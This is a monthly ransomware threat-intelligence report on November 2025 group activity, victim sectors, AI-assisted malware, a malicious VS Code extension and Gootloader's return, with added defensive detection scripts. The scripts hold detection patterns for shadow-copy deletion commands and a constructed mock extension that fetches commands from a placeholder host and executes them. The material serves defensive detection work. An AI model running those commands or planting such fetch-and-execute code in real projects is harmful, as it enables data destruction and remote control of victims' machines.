
TRACKING RANSOMWARE : NOVEMBER 2025

Published On : 2025-12-05

EXECUTIVE SUMMARY

November 2025 saw a reshaping of the ransomware landscape, marked by shifts in group activity and in attack methodology. Overall incident counts declined slightly from October's peak, and the largest group, Qilin, fell sharply, while Akira and INC Ransom continued to expand their operational reach. Separately, operators adopted AI-assisted tooling, environment-aware encryption that benchmarks a host before choosing how aggressively to encrypt, and cross-platform encryptors that now reach additional hypervisors. The most impacted sectors were Manufacturing, Professional Services, IT, and Healthcare, reflecting attackers' preference for environments under high operational pressure and holding valuable data. Geographically, North America remained the primary target, followed by Western Europe and select Asia-Pacific and Latin American nations. The abuse of a trusted software marketplace and the return of Gootloader's search-poisoning lures round out a month that signals a more agile, technologically enabled, and globally dispersed ecosystem, one that calls for proactive, multi-layered defenses.

INTRODUCTION

Welcome to the November 2025 Ransomware Threat Report. This report delivers a detailed analysis of the ransomware landscape, highlighting the emergence of new ransomware groups, evolving attack techniques, and notable shifts in targeted industries. By examining key trends, tactics, and significant incidents, this report aims to support organizations and security teams in understanding the current threat environment. As ransomware campaigns continue to grow in complexity, this report serves as a vital resource for anticipating future threats and strengthening proactive cybersecurity strategies.

KEY POINTS

  • Top Ransomware Groups: Qilin declined significantly (181 → 105 incidents) but still recorded the highest count, while Akira (66 → 82) and Cl0p (94 → 101) increased, signaling a shift in relative prominence. INC Ransom rose from 33 to 46; Play was essentially flat (26 → 27).
  • Monthly Activity Trends: November accounted for 11% of the year's ransomware activity recorded so far, slightly down from October's 12%, but still above the monthly average, indicating sustained high-intensity operations.
  • Industries Targeted: Manufacturing (87), Consumer Goods & Services (77), Professional Services (77), IT (62), Materials (56), and Healthcare (51) were most affected; Government, Education, and Finance faced moderate targeting.
  • Geographic Distribution: North America was most heavily impacted, followed by Europe, Asia-Pacific, Latin America, the Middle East, and Africa, demonstrating a global threat footprint.
  • Top Targeted Countries: United States (337), Canada (34), UK (23), Germany (13), Switzerland (13), Italy (12), Spain (12), Australia (12), Brazil (10), India (9), Thailand (9), Mexico (8), and Japan (8).
  • AI-Driven Threats: Malicious LLMs like WormGPT 4 and KawaiiGPT facilitated automation of phishing, exfiltration, and ransomware, lowering the skill barrier for attackers.
  • Emerging RaaS Trends: Groups are developing proprietary ransomware platforms with cross-platform capabilities and modular extortion features.
  • Adaptive Encryption Tactics: At least one group's encryptor now benchmarks the host before encryption, tuning intensity to maximize impact while avoiding the resource spikes that trigger detection.
  • Virtualization Focus: Akira extended its Linux encryptor to an additional hypervisor platform, increasing disruption potential in virtualized environments.
  • Marketplace Exploitation: An apparently AI-generated, ransomware-style VS Code extension passed Microsoft's marketplace vetting, highlighting weaknesses in trusted software ecosystems.
  • Re-emergence of Gootloader: After a seven-month hiatus, it returned using search-poisoned sites and document-based lures to distribute malware.
  • Victimology Insights: Attackers prioritized high-value, operationally critical industries with complex digital infrastructures, emphasizing sectors where disruption yields maximum leverage.

TREND COMPARISON: THE TOP 5

November's ransomware activity among the top five groups presents a mixed picture: the aggregate count fell compared to October, but the decline is entirely attributable to Qilin, while the other four groups rose:

Qilin experienced the most notable decline, dropping from 181 attacks in October to 105 in November, suggesting a reduced operational tempo or successful disruption efforts; it nonetheless remained the most active group in the dataset. Cl0p saw a slight increase, rising from 94 to 101, indicating a modest resurgence. Akira continued its upward trajectory, climbing from 66 to 82 incidents and solidifying its growing presence. INC Ransom rose from 33 to 46, while Play was essentially flat at 27 (up from 26). Overall, November reflects a narrowing gap at the top, with Qilin's decline allowing Cl0p and Akira to gain relative prominence.

TRENDS COMPARISON OF RANSOMWARE ATTACKS – 2025

Looking at the monthly distribution of 2025 ransomware activity by percentage share, the year shows a relatively steady pattern, fluctuating mostly between 8% and 11%, with notable peaks in February (16%) and October (12%). The most relevant trend emerges in the last two months: October's 12% is the second-highest level of the year, indicating a surge in ransomware operations heading into Q4. November's share decreased to 11%, a slight pullback, but one that still leaves the month above the yearly average, suggesting that ransomware pressure remained elevated.

INDUSTRIES TARGETED IN NOV 2025

In November, ransomware operators continued to target a broad range of industries, with Manufacturing remaining the most affected sector at 87 incidents, highlighting its ongoing vulnerability due to complex supply chains and legacy systems. Consumer Goods & Services and Professional Services followed closely at 77 attacks each, reflecting attackers' focus on sectors with high data value and operational pressure to restore services quickly. Information Technology (62), Materials (56), and Healthcare (51) also saw substantial activity, underscoring persistent exposure in critical and data-rich environments. Sectors such as Government, Education, and Finance experienced moderate but steady targeting, while Automotive, Energy, and Telecommunications recorded comparatively lower volumes. Notably, 24 victims could not be assigned to an industry, reflecting the limited detail many leak-site postings provide. Overall, November's data shows that ransomware groups continue to diversify their targeting while prioritizing industries where disruption yields maximum leverage.

GEOGRAPHICAL TARGETS

November's ransomware activity demonstrates a broadly distributed global impact, with incidents spanning North America, Europe, Asia-Pacific, the Middle East, Latin America, and Africa. North America remains the most heavily affected region, reflecting both its large digital footprint and its high concentration of organizations attractive to threat actors. Europe shows consistent targeting across a wide mix of countries, indicating that attackers continue to focus on mature economies with interconnected industries. In the Asia-Pacific region, activity is dispersed across several nations, underscoring exposure across both mature and rapidly digitizing markets. Latin American countries also appear steadily within the dataset, suggesting increased adversary interest as digital adoption accelerates. Meanwhile, the Middle East and parts of Africa register smaller but notable incident volumes, demonstrating that ransomware operations are no longer confined to traditionally high-value regions. Overall, the distribution highlights a global threat landscape, with adversaries increasingly opportunistic and willing to target organizations across diverse geographic and economic environments.

TOP TARGETED COUNTRIES

The top-targeted countries in November show a clear concentration of activity in a few major regions. The United States stands out overwhelmingly with 337 incidents, making it the most frequently targeted nation owing to its large digital ecosystem and high-value industries. A steep drop follows with Canada (34) and the United Kingdom (23), both of which remain prime targets because of their strong economic profiles and extensive online infrastructures. Several European countries form the next tier, including Germany (13) and Switzerland (13), along with Italy (12) and Spain (12), reflecting sustained attacker interest across Western Europe. In the Asia-Pacific region, Australia (12), India (9), Thailand (9), and Japan (8) also show notable activity, underscoring the region's rising digital exposure. Latin American nations such as Brazil (10) and Mexico (8) feature in the same mid-range, indicating expanding threat actor focus as these economies digitize. Overall, these countries represent the core of ransomware targeting in November, driven by a mix of economic opportunity, technological maturity, and global interconnectivity.

Evolutions in the Ransomware Threat Landscape:

Malicious LLMs Like WormGPT 4 and KawaiiGPT Accelerate Cyberattacks
Cybercriminals are increasingly adopting unrestricted AI models such as WormGPT 4 and KawaiiGPT to automate malicious activity. These models can generate polished phishing emails, craft deceptive ransom notes, and even produce scripts that support data theft or system compromise. While WormGPT 4 demonstrated the ability to output a functional ransomware-like encryptor, KawaiiGPT proved capable of generating tools for lateral movement and exfiltration, making advanced attacks more accessible to low-skill actors. Their growing user communities highlight how such models are already influencing real-world threat activity.

ETLM Assessment:
The rise of purpose-built malicious LLMs suggests a shift toward AI-accelerated cybercrime, where attackers rely on models to rapidly produce social engineering lures, automate reconnaissance, and assemble modular code components. Over time, these systems may integrate with underground ecosystems, enabling plug-and-play attack kits that combine AI-generated scripts with commodity malware. We can expect the next phase to include more autonomous tooling, more convincing impersonation attacks, and cross-platform payload generation, reducing the skill barrier and increasing attack velocity. This evolution underscores the need for defensive AI, strict access controls, and continuous monitoring of emerging AI-driven threat capabilities.

Emerging RaaS Signals a Strategic Shift in Criminal Alliances
A new extortion platform under development has surfaced, revealing an effort by a well-known threat collective to launch its own ransomware service instead of relying on borrowed or leaked tools. Early samples show a custom-built encryptor with an extensive feature set, including mechanisms to evade logging, terminate processes, spread across networks, erase recovery options, and apply a unique file structure during encryption. Each compromised system is left with tailored ransom instructions and a warning wallpaper, reflecting a more polished, enterprise-style extortion process. The developers behind the project are also preparing cross-platform versions and a faster variant, indicating plans for a broad, scalable operation.

ETLM Assessment:
The emergence of this platform suggests a movement toward more vertically integrated ransomware operations, where groups build proprietary tooling to avoid dependence on established players. As these actors refine their ecosystem, we can expect more modular payloads, quicker deployment cycles, and hybrid extortion strategies that blend data theft, network disruption, and accelerated negotiation pressure. Continued development across multiple operating environments could extend the threat surface, allowing affiliates to strike diverse targets with greater efficiency. This trajectory highlights the growing sophistication of bespoke criminal toolchains and the importance of anticipating rapid capability upgrades rather than responding only after new variants appear.

Adaptive Encryption Tactics Mark a New Phase in Ransomware Operations
A recently active extortion group has introduced an unusual capability in its malware: the ability to test a system’s performance before choosing how aggressively to encrypt its data. By timing the encryption of temporary files, the operators determine whether a machine can withstand full encryption without drawing attention through heavy resource use. Attacks typically begin with the exploitation of exposed services, followed by credential theft, remote access, and data exfiltration. Once ready, the malware disables recovery mechanisms, benchmarks the host, and then encrypts local drives, shared resources, databases, and virtual infrastructure. A cleanup script erases traces of the intrusion, leaving behind only locked files and a ransom note.

ETLM Assessment:
This adaptive approach signals an evolution toward more strategic, efficiency-driven ransomware deployments. Instead of relying on fixed encryption behaviors, actors are beginning to tailor impact based on the environment, aiming to maximize disruption while minimizing detection. If this trend continues, we can expect broader use of automated pre-attack profiling, dynamic payload tuning, and stealth mechanisms that adjust in real time. Future variants may further integrate reconnaissance data to prioritize high-value assets, shorten dwell time, and streamline extortion. This shift underscores the increasing sophistication of threat actors and the rising importance of proactive monitoring across exposed services, remote access pathways, and virtualization layers.

Akira Broadens Its Reach to New Virtualization Targets
Recent activity shows that Akira has expanded its Linux-based encryptor to lock virtual machines running on an additional major hypervisor platform, widening the operation’s impact beyond its previously known targets. The group has been observed encrypting disk images associated with this environment without first issuing graceful shutdown commands, indicating that its support for the platform is newer and less mature. At the same time, attackers continue to rely on stolen access, weak credentials, and unpatched weaknesses to enter networks, disable recovery mechanisms, and steal data quickly—sometimes within only a few hours.

ETLM Assessment:
This expansion suggests that Akira is steadily adapting to the diversity of enterprise virtual infrastructures. Going forward, more ransomware crews may prioritize cross-hypervisor support to maximize pressure on victims and disrupt critical workloads at scale. As adversaries refine techniques for navigating virtual environments, we may see faster data theft, more automated credential abuse, and broader targeting of backup systems to eliminate recovery paths. Organizations operating virtualized environments should anticipate increasing focus on these platforms and prepare for rapid-strike extortion activity that leverages gaps in configuration and patching.
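The adaptive-encryption and Akira sections above describe a recognizable staged sequence: recovery mechanisms disabled, a handful of temporary files written and deleted to time the host, a burst of renames as data is locked, and, on hypervisor hosts, direct writes to VM disk images by something other than the hypervisor process. The script below is an added example, not code from the report or from any of the groups it describes. It runs a per-process heuristic over constructed endpoint events; the event field names, thresholds, recovery-tampering command strings, and the hypervisor process allow-list are all assumptions to be adapted to real telemetry.

```python
"""Added example: staged-behaviour detector over constructed endpoint events.

Each event is a dict: ts (seconds), pid, proc (image name), op in
{exec, write, delete, rename} plus cmd / path / src+dst. Not real telemetry.
"""
from collections import defaultdict

# Assumed thresholds; tune per environment.
BENCH_MIN_FILES = 3        # temp files written then deleted = timing probe
BENCH_WINDOW_S = 10.0
MASS_RENAME_MIN = 20
MASS_WINDOW_S = 60.0

RECOVERY_CMDS = ("vssadmin delete shadows", "wbadmin delete catalog",
                 "wmic shadowcopy delete", "recoveryenabled no")
VM_DISK_EXT = (".vmdk", ".qcow2", ".vhdx", ".vhd")
HYPERVISOR_PROCS = {"vmx", "qemu-kvm", "qemu-system-x86_64", "vmms.exe"}  # assumed allow-list
TEMP_MARKERS = ("\\temp\\", "/tmp/")


def _is_temp(path):
    return any(m in path.lower() for m in TEMP_MARKERS)


def _stage_recovery(evs):
    """Any exec whose command line tampers with shadow copies / recovery."""
    return any(e["op"] == "exec" and any(c in e["cmd"].lower() for c in RECOVERY_CMDS)
               for e in evs)


def _stage_benchmark(evs):
    """Temp files written and later deleted by the same process inside a short window."""
    deleted = {e["path"] for e in evs if e["op"] == "delete" and _is_temp(e["path"])}
    probes = sorted(e["ts"] for e in evs
                    if e["op"] == "write" and _is_temp(e["path"]) and e["path"] in deleted)
    return any(probes[i + BENCH_MIN_FILES - 1] - probes[i] <= BENCH_WINDOW_S
               for i in range(len(probes) - BENCH_MIN_FILES + 1))


def _stage_mass_rename(evs):
    """>= MASS_RENAME_MIN renames that append a new extension inside MASS_WINDOW_S."""
    ts = sorted(e["ts"] for e in evs if e["op"] == "rename" and e["dst"].startswith(e["src"]))
    return any(ts[i + MASS_RENAME_MIN - 1] - ts[i] <= MASS_WINDOW_S
               for i in range(len(ts) - MASS_RENAME_MIN + 1))


def _stage_vm_disk(evs):
    """Writes to VM disk images by anything other than the hypervisor itself."""
    return any(e["op"] == "write" and e["path"].lower().endswith(VM_DISK_EXT)
               and e["proc"] not in HYPERVISOR_PROCS for e in evs)


CHECKS = [("recovery_disabled", _stage_recovery), ("timing_probe", _stage_benchmark),
          ("mass_rename", _stage_mass_rename), ("vm_disk_write", _stage_vm_disk)]


def detect(events):
    """Return {pid: [stage, ...]} for every process that hit at least two stages."""
    by_pid = defaultdict(list)
    for e in events:
        by_pid[e["pid"]].append(e)
    alerts = {}
    for pid, evs in by_pid.items():
        hit = [name for name, fn in CHECKS if fn(evs)]
        if len(hit) >= 2:
            alerts[pid] = hit
    return alerts


def sample_events():
    """Constructed telemetry: pid 4242 runs the whole sequence; 7 and 9 are benign."""
    ev = [{"ts": 0.0, "pid": 4242, "proc": "svchost.exe", "op": "exec",
           "cmd": "vssadmin delete shadows /all /quiet"}]
    for i in range(3):                      # three timing probes in the temp directory
        p = f"C:\\Windows\\Temp\\probe{i}.tmp"
        ev.append({"ts": 1.0 + i, "pid": 4242, "proc": "svchost.exe", "op": "write", "path": p})
        ev.append({"ts": 1.5 + i, "pid": 4242, "proc": "svchost.exe", "op": "delete", "path": p})
    for i in range(25):                     # mass rename of share contents
        src = f"D:\\shares\\finance\\doc{i}.xlsx"
        ev.append({"ts": 10.0 + i, "pid": 4242, "proc": "svchost.exe", "op": "rename",
                   "src": src, "dst": src + ".locked"})
    ev.append({"ts": 40.0, "pid": 4242, "proc": "svchost.exe", "op": "write",
               "path": "/vmfs/volumes/ds1/erp/erp-flat.vmdk"})
    ev.append({"ts": 5.0, "pid": 9, "proc": "vmx", "op": "write",        # hypervisor I/O
               "path": "/vmfs/volumes/ds1/erp/erp-flat.vmdk"})
    for i in range(5):                      # backup job renaming a few files
        ev.append({"ts": 20.0 + i, "pid": 7, "proc": "backup.exe", "op": "rename",
                   "src": f"E:\\bak\\f{i}", "dst": f"E:\\bak\\f{i}.bak"})
    return ev


if __name__ == "__main__":
    for pid, stages in detect(sample_events()).items():
        print(f"ALERT pid={pid}: {' -> '.join(stages)}")
```

Requiring two stages per process is what keeps the backup job and the hypervisor's own disk I/O quiet; a single stage such as shadow-copy deletion is still worth logging on its own, but the combination is what distinguishes the pre-encryption phase described above from routine administration.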

AI-Generated Ransomware Test Highlights Major Gaps in Microsoft’s Extension Review
A crude but functional ransomware-style extension—apparently built with the help of AI—briefly made its way onto Microsoft’s official VS Code marketplace. The extension openly advertised its ability to steal files, upload them to a remote server, and encrypt local data, yet still passed Microsoft’s vetting process. Once installed, it activated automatically, running a script containing hardcoded keys and network addresses that pointed to basic data-theft and encryption actions. It also checked a private online repository for commands, revealing simple remote-control behavior. Although unsophisticated, the extension demonstrated how easily malicious code can slip past Microsoft’s moderation and reach millions of developers.

ETLM Assessment:
This incident suggests that attackers—even those with minimal skills—may increasingly test or exploit trust in official software marketplaces. With AI lowering the barrier to creating functional malware, future attempts could involve more polished extensions designed to quietly harvest data, inject malicious code into development workflows, or compromise entire supply chains. If review processes remain lenient, threat actors may escalate from obvious “tests” to stealthy implants that blend into legitimate tooling. Developer environments, long considered safe, may become prime entry points for widespread compromise unless marketplace security gains stricter automated and human oversight.
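The extension described above combined three traits a reviewer can check statically: unconditional activation, hardcoded keys and network addresses, and code that walks, encrypts and uploads files while polling a remote location for commands. The script below is an added example written for this report, not the marketplace extension itself nor Microsoft's review tooling. It opens a .vsix (a zip; the extension/ layout is assumed), flags broad activationEvents and suspicious JavaScript patterns, and scores the result. The sample package, the regexes and the scoring weights are all constructed assumptions.

```python
"""Added example: static triage of a VS Code extension package (.vsix = zip).

The sample package built here mimics the described behaviour and is not the
real extension. Layout, patterns and scoring are assumptions.
"""
import io
import json
import re
import zipfile

SUSPICIOUS = {
    "exec":   re.compile(r"require\(['\"]child_process['\"]\)"),
    "cipher": re.compile(r"crypto\.createCipheriv|createCipher\("),
    "upload": re.compile(r"\b(fetch|https?\.request|axios\.post)\s*\("),
    "url":    re.compile(r"https?://[^\s'\"]+"),
    "hexkey": re.compile(r"['\"][0-9a-fA-F]{32,}['\"]"),   # hardcoded key material
    "walk":   re.compile(r"readdirSync|fs\.readdir|glob\("),
}
BROAD_ACTIVATION = {"*", "onStartupFinished"}   # runs without any user action


def triage_vsix(data):
    """Return {'activation': [...], 'findings': [(file, tag, snippet)]} for a .vsix blob."""
    out = {"activation": [], "findings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "extension/package.json" in names:
            pkg = json.loads(z.read("extension/package.json"))
            out["activation"] = [a for a in pkg.get("activationEvents", [])
                                 if a in BROAD_ACTIVATION]
        for name in names:
            if not name.endswith(".js"):
                continue
            src = z.read(name).decode("utf-8", "replace")
            for tag, rx in SUSPICIOUS.items():
                for m in rx.finditer(src):
                    out["findings"].append((name, tag, m.group(0)[:60]))
    return out


def risk_score(report):
    """Assumed scoring: broad activation (2) + exec/cipher/upload (2) + url/hexkey (1) + walk (1)."""
    tags = {t for _, t, _ in report["findings"]}
    score = 0
    if report["activation"]:
        score += 2
    if tags & {"exec", "cipher", "upload"}:
        score += 2
    if tags & {"url", "hexkey"}:
        score += 1
    if "walk" in tags:
        score += 1
    return score


def build_sample_vsix():
    """Constructed package: auto-activates, walks files, encrypts, uploads, polls for commands."""
    pkg = {"name": "helper", "publisher": "example", "version": "0.0.1",
           "activationEvents": ["*"], "main": "./extension.js"}
    js = r'''
const fs = require("fs"), crypto = require("crypto"), cp = require("child_process");
const KEY = "00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff";
const C2 = "https://example.invalid/cmds.txt";   // placeholder, not a real host
function activate() {
  for (const f of fs.readdirSync(process.cwd())) { /* encrypt + upload */ }
  const c = crypto.createCipheriv("aes-256-cbc", Buffer.from(KEY, "hex"), Buffer.alloc(16));
  fetch(C2).then(r => r.text()).then(cmd => cp.exec(cmd));
}
module.exports = { activate };
'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("extension/package.json", json.dumps(pkg))
        z.writestr("extension/extension.js", js)
    return buf.getvalue()


if __name__ == "__main__":
    rep = triage_vsix(build_sample_vsix())
    print("activation:", rep["activation"], "score:", risk_score(rep))
    for f in rep["findings"]:
        print("  ", f)
```

A scanner like this is a gate, not a verdict: obfuscated or dynamically loaded code will evade the regexes, so the practical use is to block broad activation plus network or child-process access from entering an internal extension allow-list until a human has read the code.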

Gootloader Malware Returns After Seven-Month Break
The Gootloader malware operation is back after seven months, once again using fake, search-boosted websites offering legal document templates to trick people into downloading malicious files. When opened, these files give attackers a foothold on the victim’s computer, often leading to ransomware attacks.

The new campaign uses simple but clever tricks to avoid detection, including disguising website text so it looks normal to visitors but unreadable to security tools, and using ZIP files that appear harmless in scans but deliver malware when opened in Windows. Once inside a network, attackers can move quickly—sometimes reaching key systems within hours.

ETLM Assessment:
Gootloader is expected to keep targeting everyday web searches and common document downloads, relying on deception rather than complex techniques. The group is likely to expand its keyword targeting and continue refining tricks that help it blend in and bypass basic security checks. Users and organizations should avoid downloading templates from unknown websites.
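The ZIP trick mentioned above relies on different parsers seeing different contents: a scanner that trusts the archive's central directory (as most libraries do) sees one file, while a client that walks local file headers from the start of the file sees another. The script below is an added example, not Gootloader's own tooling nor code from the report; it compares those two views and counts end-of-central-directory records, and builds a constructed concatenated archive to exercise the check. A hit on any of these findings is a reason to quarantine the file rather than trust a single parser's verdict.

```python
"""Added example: flag ZIP archives whose contents depend on the parser.

Compares Python's central-directory view (what most scanners use) with a
sequential walk of local file headers from byte 0. Sample archives are
constructed inline; no real Gootloader sample is involved.
"""
import io
import struct
import zipfile

LFH_SIG = b"PK\x03\x04"    # local file header
CDH_SIG = b"PK\x01\x02"    # central directory header
EOCD_SIG = b"PK\x05\x06"   # end of central directory


def walk_local_headers(data):
    """Names found by following local file headers forward from offset 0."""
    names, off = [], 0
    while data.startswith(LFH_SIG, off):
        # version, flags, method, time, date, crc, csize, usize, nlen, xlen
        _, flags, _, _, _, _, csize, _, nlen, xlen = struct.unpack_from("<HHHHHIIIHH", data, off + 4)
        if flags & 0x08:          # data descriptor: sizes unknown up front, cannot walk
            break
        names.append(data[off + 30: off + 30 + nlen].decode("utf-8", "replace"))
        off += 30 + nlen + xlen + csize
    return names, off


def central_directory_names(data):
    """What zipfile (and most scanners) report, driven by the last EOCD record."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.namelist()


def analyze_zip(data):
    cd = central_directory_names(data)
    lfh, consumed = walk_local_headers(data)
    eocds = data.count(EOCD_SIG)          # heuristic; signature may occur in data by chance
    findings = []
    if eocds > 1:
        findings.append(f"multiple EOCD records ({eocds}): concatenated archives")
    if set(lfh) != set(cd):
        findings.append(f"parser disagreement: local headers {lfh} vs central directory {cd}")
    first_cd = data.find(CDH_SIG)
    if first_cd != -1 and consumed < first_cd:
        findings.append("unreferenced bytes between last walkable entry and central directory")
    return {"central_dir": cd, "local_headers": lfh, "findings": findings}


def make_zip(files):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, content in files.items():
            z.writestr(name, content)
    return buf.getvalue()


def sample_concatenated():
    """Constructed: a benign archive followed by a second archive carrying a script."""
    decoy = make_zip({"Agreement_Template.txt": "Lorem ipsum"})
    payload = make_zip({"Agreement_Template.js": "WScript.Echo('constructed sample')"})
    return decoy + payload


if __name__ == "__main__":
    for label, blob in (("clean", make_zip({"Agreement_Template.txt": "x"})),
                        ("concatenated", sample_concatenated())):
        r = analyze_zip(blob)
        print(label, r["central_dir"], r["local_headers"], r["findings"] or "OK")
```

For the concatenated sample, zipfile reports only the trailing archive's script while the header walk sees only the leading decoy, which is exactly the disagreement that lets a lure pass one tool and execute in another.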

EMERGING GROUPS

Akira
Akira continued to strengthen its position as an emerging ransomware threat in November, showing a notable rise in activity from 66 incidents in October to 82. This steady growth highlights the group's expanding capabilities, increased targeting, and growing operational confidence. Akira has been building its presence across multiple industries and regions, typically combining double extortion with the exploitation of common vulnerabilities and weak or stolen credentials, and has now extended its Linux encryptor to an additional hypervisor platform. Its upward trend signals that Akira is transitioning from a mid-tier group into a more prominent and persistent threat, making it one of the key emerging ransomware actors to monitor closely in the coming months.

Source: Underground forum

INC Ransom
INC Ransom has trended upward over the last four months, solidifying its position as a rapidly emerging ransomware group. The group recorded 25 attacks in August, rose to 40 in September, dipped to 34 in October, and then jumped to 46 in November, its highest monthly total in the period. This overall growth highlights INC Ransom's expanding operational capability and increasing presence across victim disclosures. The escalation suggests the group is scaling its infrastructure, improving its extortion methods, and widening its target scope, as its claimed attack on the CodeRED emergency-notification platform (see Key Ransomware Events below) illustrates. With this sustained rise, INC Ransom is clearly transitioning from a lower-tier actor into a more prominent and disruptive threat within the ransomware ecosystem.

Source: Underground forum

KEY RANSOMWARE EVENTS

The Crisis24 OnSolve CodeRED platform suffered a major ransomware attack that disrupted emergency notification systems used by local governments, police, and fire departments across the United States. The incident, later claimed by the INC Ransom gang, forced Crisis24 to permanently decommission its legacy CodeRED environment and rebuild from older backups, causing significant nationwide outages. While the attack was contained to CodeRED, attackers were able to steal sensitive user data.

ETLM Assessment:
This attack highlights a troubling trend: ransomware operators increasingly targeting critical public-safety infrastructure. If groups like INC Ransom continue focusing on emergency platforms, the consequences could escalate—from delayed disaster alerts to compromised law-enforcement communications. The use of outdated legacy systems, as seen with CodeRED, also increases the risk that future attacks could cause longer outages, larger-scale data exposure, and deeper operational disruption.

BUSINESS IMPACT ANALYSIS

Operational Disruptions Intensified in High-Dependency Sectors:
Manufacturing, IT, Healthcare, and Professional Services faced the highest disruption risk, with attacks in November frequently affecting production cycles, service delivery commitments, and time-sensitive operations.

Increased Recovery Costs Due to Advanced Techniques:
Adaptive encryption, cross-platform targeting, and expanded virtualization attacks elevated remediation complexity, increasing the cost of system restoration, forensic analysis, and environment rebuilds.

AI-Assisted Threats Reduced Detection Timeframes:
Malicious LLMs accelerated the creation of phishing, reconnaissance scripts, and ransomware components, shrinking the window for organizations to detect and contain intrusions, thereby amplifying downtime and data-loss impact.

Critical Infrastructure and Public-Safety Risks Escalated:
Incidents like the CodeRED attack demonstrated how ransomware now threatens emergency communication platforms, raising the potential for cascading public-safety failures and liability exposure for service providers.

Broader Exposure Through Trusted Tooling and Supply Chains:
The appearance of malicious extensions on official marketplaces highlighted the business risk of compromised development environments, which can lead to tainted software releases, customer impact, and long-term reputational damage.

Global Targeting Increased Compliance and Legal Pressure:
The concentration of attacks in North America, Western Europe, and the Asia-Pacific has heightened regulatory complications, especially for businesses handling sensitive data across multiple jurisdictions.

Growing Threat Actor Fragmentation Increased Unpredictability:
Emerging groups like Akira and INC Ransom demonstrated rapid scaling and capability development, making future threats less predictable and increasing the difficulty of long-term risk planning.

Market Confidence and Customer Trust at Risk:
With high-profile industries hit repeatedly, clients and partners may perceive reduced reliability, impacting contract renewals, customer retention, and competitive positioning.

EXTERNAL THREAT LANDSCAPE MANAGEMENT (ETLM) OVERVIEW

Impact Assessment
November's ransomware landscape reflects a cumulative operational strain across both private and public sectors, as expanding threat capabilities fueled by malicious LLMs, adaptive encryption tactics, and new RaaS platforms intensified the disruption potential of each incident. AI-generated tooling lowered the threshold for producing tailored phishing campaigns, rapid reconnaissance, and functional malware components, increasing attack velocity and straining defensive detection cycles. Vertically integrated ransomware projects and environment-aware encryptors further reduced containment windows, enabling actors to cripple virtual infrastructure, erase recovery paths, and push victims toward faster negotiation. The re-emergence of Gootloader widened the infection funnel through search poisoning and document lures, while the marketplace incident added malicious developer extensions as a supply-chain-adjacent vector. Collectively, these developments amplified operational downtime, complicated incident response, and expanded the scale of potential data exposure, especially where legacy systems or automated trust-based ecosystems were involved.

Victimology
Victim profiles during November show attackers concentrating on environments where operational urgency, digital complexity, and data density heighten leverage. Manufacturing, professional services, IT, and healthcare stood out as prime targets because of their reliance on continuous uptime and interconnected infrastructure, while consumer-facing sectors faced pressure stemming from high transactional volume and sensitive customer data. Geographically, the United States remained the core focus, with Canada, the UK, Western Europe, and key Asia-Pacific economies forming the next tier: regions characterized by mature digital ecosystems and broad attack surfaces. Akira expanded toward virtualization-heavy enterprises and INC Ransom toward public-safety platforms, while opportunistic vectors like Gootloader pulled in individuals and organizations through routine document-based workflows. Across all regions and industries, the victim pool demonstrates a consistent adversary preference for environments where service disruption, regulatory exposure, or public-safety dependency maximizes extortion value.

CONCLUSION

November’s ransomware landscape underscores a strategic realignment among threat actors rather than simply an escalation of attack volume. Groups are refining their ecosystems, experimenting with new operational models, and expanding into overlooked attack surfaces—particularly virtualization layers, developer environments, and fragmented supply-chain touchpoints. The month’s shifts point to a maturing ecosystem in which threat actors diversify their footholds, broaden geographic reach, and adjust their tooling based on real-world effectiveness. Established groups recalibrated their activity levels, while emerging clusters demonstrated clearer intent and direction, signaling that the competitive dynamics within the criminal underground are evolving. Overall, the patterns observed in November highlight an ecosystem moving toward specialization, agility, and broader target dispersion, setting the stage for more unpredictable and varied ransomware behavior in the months ahead.

RECOMMENDATIONS

Strengthen Endpoint and Network Defenses

  • Deploy behavioral endpoint detection and response (EDR) that alerts on the precursors described in this report regardless of how the payload was produced: shadow-copy and recovery tampering, short bursts of temp-file writes followed by deletes, mass renames to a new extension, and writes to VM disk images by non-hypervisor processes.
  • Implement network segmentation and strict access controls to limit lateral movement, particularly in virtualized and critical infrastructure environments; hypervisor management interfaces should never be reachable from general user networks.

Enhance Threat Intelligence and Monitoring

  • Leverage threat intelligence feeds to track emerging ransomware groups like Akira and INC Ransom, their TTPs, and evolving AI-assisted capabilities.
  • Conduct continuous monitoring of exposed services, cloud environments, and VPN/remote-access endpoints to detect early signs of intrusion.

Implement AI-Aware Security Controls

  • Integrate anomaly detection to identify automated phishing campaigns, lateral movement, and adaptive encryption attempts, recognizing that AI-generated lures lack the spelling and grammar tells that older awareness training relied on.
  • Govern developer tooling and software marketplaces as a supply-chain risk: maintain an allow-list of approved extensions, review activation triggers, network access, and child-process use before approval, and treat extensions in community ecosystems like VS Code as untrusted code until reviewed.

Backup and Recovery Hardening

  • Maintain offline, immutable backups and regularly test restoration procedures to mitigate the impact of encryption or data destruction; the CodeRED incident shows what rebuilding from older backups costs when recent ones are unavailable.
  • Back up virtual machine disk images and cloud resources off-host. Hypervisor snapshots stored on the same datastore are not backups: an encryptor with access to the datastore, as in the Akira activity described above, locks the snapshots together with the disk images.

User Awareness and Training

  • Conduct phishing simulation campaigns to counter AI-enhanced social engineering attacks.
  • Educate staff about safe document handling and risks associated with downloading templates or unverified software.

Incident Response and Ransomware Playbooks

  • Develop response plans incorporating AI-assisted threat behaviors and adaptive malware tactics.
  • Establish coordination with law enforcement and cyber insurance partners for rapid response and potential negotiation support.

Vulnerability Management and Patch Hygiene

  • Prioritize timely patching of critical systems, exposed services, and legacy applications to reduce exploit opportunities.
  • Regularly audit configurations and credentials, particularly in virtualized environments and supply-chain touchpoints.

Proactive Risk Assessment

  • Conduct red-team exercises that simulate the full intrusion chain seen this month, from exposed-service exploitation and credential theft through recovery tampering and hypervisor-level encryption, to identify gaps in detection and response.
  • Map critical assets and assess their exposure, particularly for organizations in high-leverage sectors such as Manufacturing, Healthcare, and Professional Services.